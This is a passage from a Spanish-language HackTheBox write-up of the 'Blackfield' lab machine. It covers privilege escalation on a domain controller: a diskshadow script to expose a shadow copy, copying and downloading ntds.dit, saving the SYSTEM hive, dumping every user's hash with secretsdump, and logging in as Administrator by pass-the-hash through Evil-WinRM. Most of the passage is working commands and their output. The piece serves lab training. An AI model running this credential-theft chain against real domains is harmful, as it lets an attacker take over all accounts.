$access_rule = New-Object System.Security.AccessControl.FileSystemAccessRule $acl_rule

$acl.AddAccessRule($access_rule)

Set-Acl -Path $path -AclObject $acl

Una vez hemos establecido los permisos, generaremos nuestro fichero diskshadow.txt con el siguiente contenido:

SET CONTEXT PERSISTENT NOWRITERS 
ADD VOLUME C: ALIAS someAlias                                                                                             
CREATE                                                                                                                    
EXPOSE %someAlias% z:                                                                                                     
RESET                                                                                                                     
EXIT

SET CONTEXT PERSISTENT NOWRITERS

ADD VOLUME C: ALIAS someAlias

CREATE

EXPOSE %someAlias% z:

RESET

EXIT

Y ejecutaremos el mismo para realizar el backup:

*Evil-WinRM* PS C:\tmp> diskshadow.exe /s diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC01,  6/10/2020 10:47:57 AM

-> set context persistent nowriters
-> add volume c: alias someAlias
-> create
Alias someAlias for shadow ID {1d155cf3-2d05-41b3-8fc0-82239bef3860} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {f45e1826-fd36-421b-961b-de6e4519294d} set as environment variable.

Querying all shadow copies with the shadow copy set ID {f45e1826-fd36-421b-961b-de6e4519294d}

        * Shadow copy ID = {1d155cf3-2d05-41b3-8fc0-82239bef3860}               %someAlias%
                - Shadow copy set: {f45e1826-fd36-421b-961b-de6e4519294d}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
                - Creation time: 6/10/2020 10:47:57 AM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: DC01.BLACKFIELD.local
                - Service machine: DC01.BLACKFIELD.local
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %someAlias% z:
-> %someAlias% = {1d155cf3-2d05-41b3-8fc0-82239bef3860}
The shadow copy was successfully exposed as z:\.
-> reset
-> exit

*Evil-WinRM* PS C:\tmp> diskshadow.exe /s diskshadow.txt

Microsoft DiskShadow version 1.0

On computer: DC01, 6/10/2020 10:47:57 AM

-> set context persistent nowriters

-> add volume c: alias someAlias

-> create

Alias someAlias for shadow ID {1d155cf3-2d05-41b3-8fc0-82239bef3860} set as environment variable.

Alias VSS_SHADOW_SET for shadow set ID {f45e1826-fd36-421b-961b-de6e4519294d} set as environment variable.

Querying all shadow copies with the shadow copy set ID {f45e1826-fd36-421b-961b-de6e4519294d}

* Shadow copy ID = {1d155cf3-2d05-41b3-8fc0-82239bef3860} %someAlias%

- Shadow copy set: {f45e1826-fd36-421b-961b-de6e4519294d} %VSS_SHADOW_SET%

- Original count of shadow copies = 1

- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]

- Creation time: 6/10/2020 10:47:57 AM

- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

- Originating machine: DC01.BLACKFIELD.local

- Service machine: DC01.BLACKFIELD.local

- Not exposed

- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}

- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1

-> expose %someAlias% z:

-> %someAlias% = {1d155cf3-2d05-41b3-8fc0-82239bef3860}

The shadow copy was successfully exposed as z:\.

-> reset

-> exit

Ahora nos queda acceder al disco z creado con nuestra copia y obtener el fichero ntds.dit:

*Evil-WinRM* PS z:\> copy z:\windows\ntds\ntds.dit c:\tmp
*Evil-WinRM* PS z:\> cd c:\tmp
*Evil-WinRM* PS C:\tmp> dir


    Directory: C:\tmp


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/10/2020  10:47 AM            611 2020-06-10_10-47-57_DC01.cab
-a----        6/10/2020  10:47 AM            112 diskshadow.txt
-a----        6/10/2020  10:44 AM       18874368 ntds.dit


*Evil-WinRM* PS C:\tmp> download ntds.dit
Info: Downloading C:\tmp\ntds.dit to ntds.dit

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\tmp>

*Evil-WinRM* PS z:\> copy z:\windows\ntds\ntds.dit c:\tmp

*Evil-WinRM* PS z:\> cd c:\tmp

*Evil-WinRM* PS C:\tmp> dir

Directory: C:\tmp

Mode LastWriteTime Length Name

---- ------------- ------ ----

-a---- 6/10/2020 10:47 AM 611 2020-06-10_10-47-57_DC01.cab

-a---- 6/10/2020 10:47 AM 112 diskshadow.txt

-a---- 6/10/2020 10:44 AM 18874368 ntds.dit

*Evil-WinRM* PS C:\tmp> download ntds.dit

Info: Downloading C:\tmp\ntds.dit to ntds.dit

Info: Download successful!

*Evil-WinRM* PS C:\tmp>

Para obtener los hashes necesitaremos también el fichero system, así que haremos una copia desde el registro de windows:

reg save hklm\system c:\tmp\system

1	reg save hklm\system c:\tmp\system

Y ahora obtendremos los hashes de los usuarios con la tool de impacket secretsdump:

$ secretsdump.py -ntds ntds.dit -system system LOCAL

1	$ secretsdump.py -ntds ntds.dit -system system LOCAL

Y conseguiremos las claves de todos los usuarios.

Obteniendo la flag de root

Obtenidos los hashes, sólo nos queda acceder al sistema como admin:

$ ruby evil-winrm.rb -u Administrator -H XXXXXXXXXXXXXXXXXXXXXXXX -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/28/2020   4:36 PM            447 notes.txt
-ar---        6/10/2020  11:04 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop>

$ ruby evil-winrm.rb -u Administrator -H XXXXXXXXXXXXXXXXXXXXXXXX -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

blackfield\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\desktop

*Evil-WinRM* PS C:\Users\Administrator\desktop> dir

Directory: C:\Users\Administrator\desktop

Mode LastWriteTime Length Name

---- ------------- ------ ----

-a---- 2/28/2020 4:36 PM 447 notes.txt

-ar--- 6/10/2020 11:04 AM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\desktop>

Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.

Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace https://www.hackthebox.eu/home/users/profile/103792

HackTheBox machines – Blackfield WriteUp

Blackfield es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox.

Escaneo de puertos

Enumeración

Obteniendo la flag de user

Escalado de privilegios

Obteniendo la flag de root

Tal vez te interese...

Deja una respuesta Cancelar la respuesta

Tal vez te interese...

Búsqueda

Escaneo de puertos

Enumeración

Obteniendo la flag de user

Escalado de privilegios

Obteniendo la flag de root

Tal vez te interese...

Deja una respuesta Cancelar la respuesta

Tal vez te interese...

Búsqueda

Populares

Nube de Tags